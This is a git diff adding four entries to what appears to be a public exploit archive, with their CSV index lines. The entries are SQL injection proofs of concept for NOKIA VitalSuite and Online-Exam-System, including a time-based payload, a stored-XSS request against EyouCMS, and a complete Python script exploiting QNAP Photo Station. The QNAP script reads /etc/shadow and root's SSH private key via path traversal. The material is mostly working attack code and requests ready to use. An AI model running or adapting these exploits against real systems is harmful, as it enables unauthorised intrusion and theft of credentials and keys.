diff --git a/exploits/multiple/webapps/48528.txt b/exploits/multiple/webapps/48528.txt
new file mode 100644
index 000000000..090d8ca73
--- /dev/null
+++ b/exploits/multiple/webapps/48528.txt
@@ -0,0 +1,31 @@
+# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2020-05-28
+# Vendor Homepage: https://www.nokia.com
+# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/
+# Affected Version: v2020
+# Tested on: MacosX
+# CVE : N/A
+
+
+# PoC
+
+
+POST /cgi-bin/vsloginadmin.exe HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Accept: /
+Accept-Encoding: gzip,deflate
+Content-Length: 84
+Host: berklocal
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
+like Gecko) Chrome/41.0.2228.0 Safari/537.21
+
+Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1
+
+Example Time-Based payload
+
+UserName=test'; waitfor delay '00:00:10' --
\ No newline at end of file
diff --git a/exploits/php/webapps/48529.txt b/exploits/php/webapps/48529.txt
new file mode 100644
index 000000000..edc18ebc4
--- /dev/null
+++ b/exploits/php/webapps/48529.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2020-05-28
+# Vendor Homepage: https://github.com/sunnygkp10/
+# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
+# Affected Version: 2015
+# Tested on: MacosX
+# CVE : N/A
+
+# PoC
+
+Affected code
+
+';
+$id=@$_GET['fid'];
+$result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or
+die('Error');
+
+http://berklocal/dash.php?fid=SQL-INJECTION
\ No newline at end of file
diff --git a/exploits/php/webapps/48530.txt b/exploits/php/webapps/48530.txt
new file mode 100644
index 000000000..7a139b6ae
--- /dev/null
+++ b/exploits/php/webapps/48530.txt
@@ -0,0 +1,30 @@
+# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting
+# Date: 2020-05-28
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: https://eyoucms.com
+# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip
+# Version: EyouCMS V1.4.6
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1
+Host: 192.168.31.244
+Content-Length: 131
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.31.244
+Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php
+Connection: close
+
+title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111
&__token__=b90d4bf2356b81f65284238857b91ada
+
+
+
+王新峰 技术管理部
+中国银行保险信息技术管理有限公司
\ No newline at end of file
diff --git a/exploits/php/webapps/48531.py b/exploits/php/webapps/48531.py
new file mode 100755
index 000000000..f1bb85f4b
--- /dev/null
+++ b/exploits/php/webapps/48531.py
@@ -0,0 +1,103 @@
+# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
+# Exploit Author: Yunus YILDIRIM (Th3Gundy)
+# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
+# Date: 2020-05-28
+# Vendor Homepage: https://www.qnap.com
+# Version: QTS < 4.4.1 | Photo Station < 6.0.3
+# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195
+# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
+# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
+# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
+
+######################################################################
+######################################################################
+
+#!/usr/bin/python3
+
+__author__ = "Yunus YILDIRIM (@Th3Gundy)"
+__version__ = "0.1"
+
+
+import requests
+import re, sys
+
+# hide ssl error
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def get_banner():
+ print("""\033[91m
+ █████ ███▄ █ ▄▄▄ ██▓███
+▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒
+▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒
+░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒
+░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░
+░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░
+ ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░
+ ░ ░ ░ ░ ░ ░ ▒ ░░
+ ░ ░ ░ ░ \033[0m \033[94m {0} \033[0m
+ """.format(__author__))
+
+
+def get_file_content(file):
+ post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
+ file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+ print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text))
+
+# print banner
+get_banner()
+
+if len(sys.argv) != 2:
+ print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m")
+ sys.exit(-1)
+
+url = sys.argv[1].rstrip('/')
+headers = {"User-Agent": "Gundy - QNAP RCE"}
+
+# for session cookie
+req = requests.Session()
+
+#######################################################################
+# search album_id
+
+print("="*65)
+post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
+album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+if album_id_response.status_code != 200:
+ print("album id not found \n\033[91mnot vulnerable\033[0m")
+ sys.exit(0)
+
+album_id = re.search('(?<=)', album_id_response.text).group()
+
+print("album_id ==> " + album_id)
+
+#######################################################################
+# search $_SESSION['access_code']
+
+access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
+if access_code_response.status_code != 200:
+ print("slideshow not found \n\033[91mnot vulnerable\033[0m")
+ sys.exit(0)
+
+access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
+
+print("access_code ==> " + access_code)
+
+#######################################################################
+
+# /etc/passwd file read
+get_file_content('./../../../../../etc/passwd')
+
+# /etc/shadow read
+get_file_content('./../../../../../etc/shadow')
+
+# /etc/hostname read
+get_file_content('./../../../../../etc/hostname')
+
+# /root/.ssh/id_rsa read
+get_file_content('./../../../../../root/.ssh/id_rsa')
+
+#######################################################################
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 98beb6865..2b9530404 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42755,3 +42755,7 @@ id,file,description,date,author,type,platform,port
48525,exploits/php/webapps/48525.txt,"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php,
48526,exploits/php/webapps/48526.txt,"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting",2020-05-27,"China Banking and Insurance Information Technology Management Co.",webapps,php,
48527,exploits/php/webapps/48527.txt,"OXID eShop 6.3.4 - 'sorting' SQL Injection",2020-05-27,VulnSpy,webapps,php,
+48528,exploits/multiple/webapps/48528.txt,"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection",2020-05-28,"Berk Dusunur",webapps,multiple,
+48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,
+48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php,